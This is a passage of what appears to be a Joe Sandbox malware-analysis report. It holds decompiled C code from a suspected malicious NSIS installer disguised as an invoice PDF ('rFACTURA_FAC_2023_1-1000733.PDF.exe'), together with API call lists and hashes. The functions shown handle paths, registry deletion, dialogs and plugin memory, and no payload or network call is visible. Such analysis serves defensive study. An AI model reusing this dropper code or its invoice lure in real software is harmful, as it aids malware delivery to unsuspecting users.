                                                                                                  					_t41 = E00402C15(2);
                                                                                                  					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                                                  					_t56 =  *(_t64 - 0x14) >> 2;
                                                                                                  					if(__eflags == 0) {
                                                                                                  						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
                                                                                                  						L10:
                                                                                                  						 *(_t64 - 0x30) = _t36;
                                                                                                  					} else {
                                                                                                  						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
                                                                                                  						asm("sbb eax, eax");
                                                                                                  						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                                                                  				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                                                                  					_push( *(_t64 - 0x30));
                                                                                                  					E004061A6();
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t64 - 4));
                                                                                                  				return 0;
                                                                                                  			}















                                                                                                  0x00402a65
                                                                                                  0x00402ac2
                                                                                                  0x00402ace

                                                                                                  APIs
                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Timeout
                                                                                                  • String ID: !
                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405BDB(WCHAR* _a4) {
                                                                                                  				WCHAR* _t5;
                                                                                                  				short* _t7;
                                                                                                  				WCHAR* _t10;
                                                                                                  				short _t11;
                                                                                                  				WCHAR* _t12;
                                                                                                  				void* _t14;
                                                                                                  
                                                                                                  				_t12 = _a4;
                                                                                                  				_t10 = CharNextW(_t12);
                                                                                                  				_t5 = CharNextW(_t10);
                                                                                                  				_t11 =  *_t12;
                                                                                                  				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
                                                                                                  					if(_t11 != 0x5c || _t12[1] != _t11) {
                                                                                                  						L10:
                                                                                                  						return 0;
                                                                                                  					} else {
                                                                                                  						_t14 = 2;
                                                                                                  						while(1) {
                                                                                                  							_t14 = _t14 - 1;
                                                                                                  							_t7 = E00405B5D(_t5, 0x5c);
                                                                                                  							if( *_t7 == 0) {
                                                                                                  								goto L10;
                                                                                                  							}
                                                                                                  							_t5 = _t7 + 2;
                                                                                                  							if(_t14 != 0) {
                                                                                                  								continue;
                                                                                                  							}
                                                                                                  							return _t5;
                                                                                                  						}
                                                                                                  						goto L10;
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					return CharNextW(_t5);
                                                                                                  				}
                                                                                                  			}










                                                                                                  APIs
                                                                                                  • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,00405C4F,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,?,76F93420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405BE9
                                                                                                  • CharNextW.USER32(00000000), ref: 00405BEE
                                                                                                  • CharNextW.USER32(00000000), ref: 00405C06
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\nsp1D68.tmp, xrefs: 00405BDC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharNext
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp
                                                                                                  • API String ID: 3213498283-808641140
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 58%
                                                                                                  			E00405B30(WCHAR* _a4) {
                                                                                                  				WCHAR* _t9;
                                                                                                  
                                                                                                  				_t9 = _a4;
                                                                                                  				_push( &(_t9[lstrlenW(_t9)]));
                                                                                                  				_push(_t9);
                                                                                                  				if( *(CharPrevW()) != 0x5c) {
                                                                                                  					lstrcatW(_t9, 0x40a014);
                                                                                                  				}
                                                                                                  				return _t9;
                                                                                                  			}





                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 00405B36
                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 00405B40
                                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405B52
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 2659869361-3355392842
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 84%
                                                                                                  			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                                  				void* _v8;
                                                                                                  				short _v532;
                                                                                                  				void* _t19;
                                                                                                  				signed int _t26;
                                                                                                  				intOrPtr* _t28;
                                                                                                  				signed int _t33;
                                                                                                  				signed int _t34;
                                                                                                  				signed int _t35;
                                                                                                  
                                                                                                  				_t34 = _a12;
                                                                                                  				_t35 = _t34 & 0x00000300;
                                                                                                  				_t33 = _t34 & 0x00000001;
                                                                                                  				_t19 = E004060CC(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
                                                                                                  				if(_t19 == 0) {
                                                                                                  					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
                                                                                                  						__eflags = _t33;
                                                                                                  						if(__eflags != 0) {
                                                                                                  							RegCloseKey(_v8);
                                                                                                  							return 1;
                                                                                                  						}
                                                                                                  						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
                                                                                                  						__eflags = _t26;
                                                                                                  						if(_t26 != 0) {
                                                                                                  							break;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					RegCloseKey(_v8);
                                                                                                  					_t28 = E00406639(3);
                                                                                                  					if(_t28 == 0) {
                                                                                                  						return RegDeleteKeyW(_a4, _a8);
                                                                                                  					}
                                                                                                  					return  *_t28(_a4, _a8, _t35, 0);
                                                                                                  				}
                                                                                                  				return _t19;
                                                                                                  			}












                                                                                                  APIs
                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D98
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$Enum
                                                                                                  • String ID:
                                                                                                  • API String ID: 464197530-0
                                                                                                  • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                                                  • Instruction ID: 13ce92619e22af03a8d5f803c99d3fa2c3d1cb872fac5522cbaad6f830247a1d
                                                                                                  • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                                                  • Instruction Fuzzy Hash: 94116A32540509FBEF129F90CE09BEE7B69EF58350F110036B905B60E0E7B5DE21AB68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00402E5D(intOrPtr _a4) {
                                                                                                  				long _t2;
                                                                                                  				struct HWND__* _t3;
                                                                                                  				struct HWND__* _t6;
                                                                                                  
                                                                                                  				if(_a4 == 0) {
                                                                                                  					__eflags =  *0x7976d8; // 0x0
                                                                                                  					if(__eflags == 0) {
                                                                                                  						_t2 = GetTickCount();
                                                                                                  						__eflags = _t2 -  *0x7a8a30;
                                                                                                  						if(_t2 >  *0x7a8a30) {
                                                                                                  							_t3 = CreateDialogParamW( *0x7a8a20, 0x6f, 0, E00402DD7, 0);
                                                                                                  							 *0x7976d8 = _t3;
                                                                                                  							return ShowWindow(_t3, 5);
                                                                                                  						}
                                                                                                  						return _t2;
                                                                                                  					} else {
                                                                                                  						return E00406675(0);
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_t6 =  *0x7976d8; // 0x0
                                                                                                  					if(_t6 != 0) {
                                                                                                  						_t6 = DestroyWindow(_t6);
                                                                                                  					}
                                                                                                  					 *0x7976d8 = 0;
                                                                                                  					return _t6;
                                                                                                  				}
                                                                                                  			}







                                                                                                  APIs
                                                                                                  • DestroyWindow.USER32(00000000,00000000,0040303D,?,?,00000006,00000008,0000000A), ref: 00402E70
                                                                                                  • GetTickCount.KERNEL32 ref: 00402E8E
                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                                                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                  • String ID:
                                                                                                  • API String ID: 2102729457-0
                                                                                                  • Opcode ID: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
                                                                                                  • Instruction ID: 7afe0c5cdde3553510745d2e994aff72f2021582eecc7c7a9da0eee8c5fdd21f
                                                                                                  • Opcode Fuzzy Hash: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
                                                                                                  • Instruction Fuzzy Hash: B3F05E30966A21EBC6616B24FE8C99B7B64AB44B41B15887BF041B11B8DA784891CBDC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 53%
                                                                                                  			E00405C38(void* __eflags, intOrPtr _a4) {
                                                                                                  				int _t11;
                                                                                                  				signed char* _t12;
                                                                                                  				intOrPtr _t18;
                                                                                                  				intOrPtr* _t21;
                                                                                                  				signed int _t23;
                                                                                                  
                                                                                                  				E0040625F(0x7a4728, _a4);
                                                                                                  				_t21 = E00405BDB(0x7a4728);
                                                                                                  				if(_t21 != 0) {
                                                                                                  					E004064F3(_t21);
                                                                                                  					if(( *0x7a8a3c & 0x00000080) == 0) {
                                                                                                  						L5:
                                                                                                  						_t23 = _t21 - 0x7a4728 >> 1;
                                                                                                  						while(1) {
                                                                                                  							_t11 = lstrlenW(0x7a4728);
                                                                                                  							_push(0x7a4728);
                                                                                                  							if(_t11 <= _t23) {
                                                                                                  								break;
                                                                                                  							}
                                                                                                  							_t12 = E004065A2();
                                                                                                  							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                  								E00405B7C(0x7a4728);
                                                                                                  								continue;
                                                                                                  							} else {
                                                                                                  								goto L1;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						E00405B30();
                                                                                                  						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                                                                  					}
                                                                                                  					_t18 =  *_t21;
                                                                                                  					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                  						goto L1;
                                                                                                  					} else {
                                                                                                  						goto L5;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				L1:
                                                                                                  				return 0;
                                                                                                  			}









                                                                                                  APIs
                                                                                                    • Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,Tophyperidrosis Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C
                                                                                                    • Part of subcall function 00405BDB: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,00405C4F,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,?,76F93420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405BE9
                                                                                                    • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
                                                                                                    • Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06
                                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,?,76F93420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405C91
                                                                                                  • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,?,76F93420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 00405CA1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp
                                                                                                  • API String ID: 3248276644-808641140
                                                                                                  • Opcode ID: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
                                                                                                  • Instruction ID: 07588a96ba491492048338639ced47dd8f75e02a3aa2c86f807570fea5ede87b
                                                                                                  • Opcode Fuzzy Hash: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
                                                                                                  • Instruction Fuzzy Hash: 3FF0D125008F1115E72233361D49EAF2664CE96360B1A023FF952B12D1DB3C99939C6E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 89%
                                                                                                  			E00405237(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                  				int _t15;
                                                                                                  				long _t16;
                                                                                                  
                                                                                                  				_t15 = _a8;
                                                                                                  				if(_t15 != 0x102) {
                                                                                                  					if(_t15 != 0x200) {
                                                                                                  						_t16 = _a16;
                                                                                                  						L7:
                                                                                                  						if(_t15 == 0x419 &&  *0x7a1f0c != _t16) {
                                                                                                  							_push(_t16);
                                                                                                  							_push(6);
                                                                                                  							 *0x7a1f0c = _t16;
                                                                                                  							E00404C0D();
                                                                                                  						}
                                                                                                  						L11:
                                                                                                  						return CallWindowProcW( *0x7a1f14, _a4, _t15, _a12, _t16);
                                                                                                  					}
                                                                                                  					if(IsWindowVisible(_a4) == 0) {
                                                                                                  						L10:
                                                                                                  						_t16 = _a16;
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  					_t16 = E00404B8D(_a4, "true");
                                                                                                  					_t15 = 0x419;
                                                                                                  					goto L7;
                                                                                                  				}
                                                                                                  				if(_a12 != 0x20) {
                                                                                                  					goto L10;
                                                                                                  				}
                                                                                                  				E00404240(0x413);
                                                                                                  				return 0;
                                                                                                  			}






                                                                                                  APIs
                                                                                                  • IsWindowVisible.USER32(?), ref: 00405266
                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052B7
                                                                                                    • Part of subcall function 00404240: SendMessageW.USER32(00060020,00000000,00000000,00000000), ref: 00404252
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                  • String ID:
                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                  • Opcode ID: 03dbe0d26460962354df2622affe4a7f19e46f8d18e7fde011b494353cd470c5
                                                                                                  • Instruction ID: 5e04443d83733b215e2c60cf409d87083b19ce8acf9f2344b17a5e906d0b9b78
                                                                                                  • Opcode Fuzzy Hash: 03dbe0d26460962354df2622affe4a7f19e46f8d18e7fde011b494353cd470c5
                                                                                                  • Instruction Fuzzy Hash: E7017C31500608AFEF209F52DD81AAB3725EF95755F10407FFA00B61D0D73E9C919E69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004038D8() {
                                                                                                  				void* _t2;
                                                                                                  				void* _t3;
                                                                                                  				void* _t6;
                                                                                                  				void* _t8;
                                                                                                  
                                                                                                  				_t8 =  *0x79fee4; // 0xba1180
                                                                                                  				_t3 = E004038BD(_t2, 0);
                                                                                                  				if(_t8 != 0) {
                                                                                                  					do {
                                                                                                  						_t6 = _t8;
                                                                                                  						_t8 =  *_t8;
                                                                                                  						_t1 = _t6 + 8; // 0x10000000
                                                                                                  						FreeLibrary( *_t1);
                                                                                                  						_t3 = GlobalFree(_t6);
                                                                                                  					} while (_t8 != 0);
                                                                                                  				}
                                                                                                  				 *0x79fee4 =  *0x79fee4 & 0x00000000;
                                                                                                  				return _t3;
                                                                                                  			}








                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(10000000,C:\Users\user\AppData\Local\Temp\,00000000,76F93420,004038B0,004036C6,00000006,?,00000006,00000008,0000000A), ref: 004038F2
                                                                                                  • GlobalFree.KERNEL32(00BA1180), ref: 004038F9
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004038EA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 1100898210-3355392842
                                                                                                  • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                                  • Instruction ID: 0fbf8731d8bad765cb9f744f6f02bb9fbed9ce401ee6a58d62f233990fc3ff23
                                                                                                  • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                                                  • Instruction Fuzzy Hash: 31E01D334011205BC6115F55FD0475A77685F44B36F15407BF9847717147B45C535BD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 77%
                                                                                                  			E00405B7C(WCHAR* _a4) {
                                                                                                  				WCHAR* _t5;
                                                                                                  				WCHAR* _t7;
                                                                                                  
                                                                                                  				_t7 = _a4;
                                                                                                  				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                                                  				while( *_t5 != 0x5c) {
                                                                                                  					_push(_t5);
                                                                                                  					_push(_t7);
                                                                                                  					_t5 = CharPrevW();
                                                                                                  					if(_t5 > _t7) {
                                                                                                  						continue;
                                                                                                  					}
                                                                                                  					break;
                                                                                                  				}
                                                                                                  				 *_t5 =  *_t5 & 0x00000000;
                                                                                                  				return  &(_t5[1]);
                                                                                                  			}






                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B82
                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharPrevlstrlen
                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                  • API String ID: 2709904686-3370423016
                                                                                                  • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                  • Instruction ID: 52ec536bf7c92ef41efc45dde312f484f3c591b0d09bb1e57af7322ca826a5e1
                                                                                                  • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                                  • Instruction Fuzzy Hash: 85D05EB24009209AD3126704DC00DAF77B8EF11310746446AE840A6166D7787C818AAC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                  				void* _v0;
                                                                                                  				void* _t17;
                                                                                                  				signed int _t19;
                                                                                                  				void* _t20;
                                                                                                  				void* _t24;
                                                                                                  				void* _t26;
                                                                                                  				void* _t30;
                                                                                                  				void* _t36;
                                                                                                  				void* _t38;
                                                                                                  				void* _t39;
                                                                                                  				signed int _t41;
                                                                                                  				void* _t42;
                                                                                                  				void* _t51;
                                                                                                  				void* _t52;
                                                                                                  				signed short* _t54;
                                                                                                  				void* _t56;
                                                                                                  				void* _t59;
                                                                                                  				void* _t61;
                                                                                                  
                                                                                                  				 *0x1000406c = _a8;
                                                                                                  				 *0x10004070 = _a16;
                                                                                                  				 *0x10004074 = _a12;
                                                                                                  				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
                                                                                                  				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
                                                                                                  				_t17 = E10001243();
                                                                                                  				_v0 = _t17;
                                                                                                  				_t52 = _t17;
                                                                                                  				if( *_t17 == 0) {
                                                                                                  					L16:
                                                                                                  					return GlobalFree(_t17);
                                                                                                  				} else {
                                                                                                  					do {
                                                                                                  						_t19 =  *_t52 & 0x0000ffff;
                                                                                                  						_t42 = 2;
                                                                                                  						_t54 = _t52 + _t42;
                                                                                                  						_t61 = _t19 - 0x6c;
                                                                                                  						if(_t61 > 0) {
                                                                                                  							_t20 = _t19 - 0x70;
                                                                                                  							if(_t20 == 0) {
                                                                                                  								L12:
                                                                                                  								_t52 = _t54 + _t42;
                                                                                                  								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
                                                                                                  								L13:
                                                                                                  								GlobalFree(_t24);
                                                                                                  								goto L14;
                                                                                                  							}
                                                                                                  							_t26 = _t20 - _t42;
                                                                                                  							if(_t26 == 0) {
                                                                                                  								L10:
                                                                                                  								_t52 =  &(_t54[1]);
                                                                                                  								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
                                                                                                  								goto L13;
                                                                                                  							}
                                                                                                  							L7:
                                                                                                  							if(_t26 == 1) {
                                                                                                  								_t30 = GlobalAlloc(0x40, _t41 + 4);
                                                                                                  								 *_t30 =  *0x10004040;
                                                                                                  								 *0x10004040 = _t30;
                                                                                                  								E10001563(_t30 + 4,  *0x10004074, _t41);
                                                                                                  								_t59 = _t59 + 0xc;
                                                                                                  							}
                                                                                                  							goto L14;
                                                                                                  						}
                                                                                                  						if(_t61 == 0) {
                                                                                                  							L17:
                                                                                                  							_t33 =  *0x10004040;
                                                                                                  							if( *0x10004040 != 0) {
                                                                                                  								E10001563( *0x10004074, _t33 + 4, _t41);
                                                                                                  								_t59 = _t59 + 0xc;
                                                                                                  								_t36 =  *0x10004040;
                                                                                                  								GlobalFree(_t36);
                                                                                                  								 *0x10004040 =  *_t36;
                                                                                                  							}
                                                                                                  							goto L14;
                                                                                                  						}
                                                                                                  						_t38 = _t19 - 0x4c;
                                                                                                  						if(_t38 == 0) {
                                                                                                  							goto L17;
                                                                                                  						}
                                                                                                  						_t39 = _t38 - 4;
                                                                                                  						if(_t39 == 0) {
                                                                                                  							 *_t54 =  *_t54 + 0xa;
                                                                                                  							goto L12;
                                                                                                  						}
                                                                                                  						_t26 = _t39 - _t42;
                                                                                                  						if(_t26 == 0) {
                                                                                                  							 *_t54 =  *_t54 + 0xa;
                                                                                                  							goto L10;
                                                                                                  						}
                                                                                                  						goto L7;
                                                                                                  						L14:
                                                                                                  					} while ( *_t52 != 0);
                                                                                                  					_t17 = _v0;
                                                                                                  					goto L16;
                                                                                                  				}
                                                                                                  			}






















                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1780285237-0
                                                                                                  • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                  • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                  • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                  • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405CB6(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                                  				int _v8;
                                                                                                  				int _t12;
                                                                                                  				int _t14;
                                                                                                  				int _t15;
                                                                                                  				CHAR* _t17;
                                                                                                  				CHAR* _t27;
                                                                                                  
                                                                                                  				_t12 = lstrlenA(_a8);
                                                                                                  				_t27 = _a4;
                                                                                                  				_v8 = _t12;
                                                                                                  				while(lstrlenA(_t27) >= _v8) {
                                                                                                  					_t14 = _v8;
                                                                                                  					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                                  					_t15 = lstrcmpiA(_t27, _a8);
                                                                                                  					_t27[_v8] =  *(_t14 + _t27);
                                                                                                  					if(_t15 == 0) {
                                                                                                  						_t17 = _t27;
                                                                                                  					} else {
                                                                                                  						_t27 = CharNextA(_t27);
                                                                                                  						continue;
                                                                                                  					}
                                                                                                  					L5:
                                                                                                  					return _t17;
                                                                                                  				}
